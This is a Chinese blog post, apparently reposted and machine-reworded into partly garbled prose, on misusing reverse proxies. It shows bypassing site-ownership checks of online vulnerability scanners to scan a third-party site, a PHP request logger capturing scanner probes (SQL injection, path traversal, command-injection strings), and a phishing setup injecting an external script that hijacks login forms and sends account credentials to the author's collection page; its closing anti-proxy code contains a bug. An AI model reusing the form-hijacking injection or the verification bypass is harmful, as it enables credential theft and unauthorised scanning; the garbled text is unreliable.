|
|
|
联系客服020-83701501

反向代理的有趣用法

联系在线客服,可以获得免费在线咨询服务。 QQ咨询 我要预约
反向代理的乏味用法

起首请各位客长看这里:http://viptest.yupage.com

这就是一个操作开源步骤7ghost搭建的反向代理演示站。

反向代理,是指反向代理办事器从方针形式办事器上抓取形式前往给用户,反向代理办事器充当了一个中介的苦守,它自己是没有任何形式的。全部流程如下:

 

2013081909582854868.jpg

全部流程非常稀奇简单,只必要经受晖映请求的.htaccess和经受抓取形式的index.php就可实现,两端还可以通过正则注解式等实现形式和网址的改革。

这种技艺还普及操作于小偷步骤中。

0x01 用反向代理让裂缝检测平台帮我们扫裂缝


此刻有一些在线裂缝检测平台(如360 安全宝等),都能让我们对方针站点的安全情况有一个开始的领会。但是,这些裂缝检测平台凡是必要验证部分权的,那么,我们能不能绕过这个限定呢?反向代理能规画这个标题问题。

起首,操作设置好反向代理的方针(如wooyun.org),然后将我们设置装备摆设好了反向代理步骤的网址输入到裂缝检测平台,选包办码验证舆论,在我们的中心中转页面(index.php)中插入这段代码,就概略通过裂缝扫描平台的验证,扫方针站的裂缝了。

0x02 搭建一个“蜜罐”来抓取裂缝扫描平台的扫描语句


各个在线裂缝扫描平台都看上去非常稀奇高端土气海内化的样子,那么,它们是怎么扫描的呢?可以操作反向代理来抓扫描语句。

起首,在index.php中心中转文件中介入一段代码,将部分请求记录到log.txt中

Default
1234567 $data = $_SERVER['REQUEST_URI'] . "n";if ($_POST) {    foreach ($_POST as $key => $value) {        $data.= "$key=$value" . 'n';    }}file_put_contents("log.txt", $data, FILE_APPEND);

然后将搭建好的“蜜罐”丢给360裂缝扫描平台扫描,大约1个小时后,去看看log.txt,已经记录下了上千条扫描日志,因为日志过长,没法部分贴上去,选取几条有代表性的贴上去,并注释了一下或许的用途,部分日志请在http://viptest.yupage.com/log.txt检查。

/index.php 用蜘蛛从主页层层抓取页面
/akjkl678686hjhjk/ 抓取404页面标识
/admin/ 扫描后台地址
/backup/ 找备份
/bugs/new_confirm/phpmyadmin/ 找phpmyadmin空口令
/crossdomain.xml 看有没有flash跨域限定
/bugs/new_submit/fckeditor/upload/ 找有裂缝的编辑器
/examples/jsp/cal/cal2.jsp?time= 检测XSS
/job.php?action=list%27and%28123%29%3D%27321 扫描SQL注射
/?&redirect:%25{13579246-1} 扫Struts2
/bugs/phpinfo.php 扫phpinfo
/job.php?action=../../../../../../../../../../../../boot.ini%00.htm 扫方便文件读取
/user.php?action=login%7Cping+-n+12+127.0.0.1 扫下令实行

除此以外,还少量扫描了一些不具有的页面,如/bugs/new_unclaimed/fckeditor/ajkljlhjh/,不晓得有何打算。

0x03 垂钓


因为部分通过反向代理办事器的页面均可以管束,所以我们也能够把持此终止垂钓。请各位看这里:http://viptest.yupage.com/user.php?action=login

我操作正则注解式在该页面中插入了一段这样的代码

Default
1 <script src="http://pujun.li/xss.js"></script><script>xss.xform(document.forms[1],'http://vip.yupage.com/wy.php');</script>

 

操作了好坏短的表单劫持代码,这样假如用户在我的演示站登录乌云帐号时就会积极把乌云帐号发送到我的一个接受页面,而照旧能正常登录的。除此以外,因为部分通过反向代理办事器的页面均可以管束,我们还可以做许多事,如在页面中动态插入一个xsser.me盗cookies等。

0x04 如何防止被反向代理


看完了反向代理的侵吞后,如何防止自己的站被反向代理呢?有一段代码概略较好地防止被反向代理

.htaccess:

Default
1 RewriteEngine On RewriteBase / php_value auto_append_file proxy.php proxy.php:

 

Default
12345 <?php      if ((getenv("HTTP_X_FORWARDED_FOR")!="")&&($getenv("HTTP_HOST")!="wooyun.org")){          exit();      }  ?>

实际上XFF头彻底可以虚构,此舆论其实不能彻底防备住~

文章作者写了反向代理的用法,其顶用反向代理来扫裂缝思路照旧很不错的,推荐给自身看看。

[via@dropwooyun]

数安新闻+更多

证书相关+更多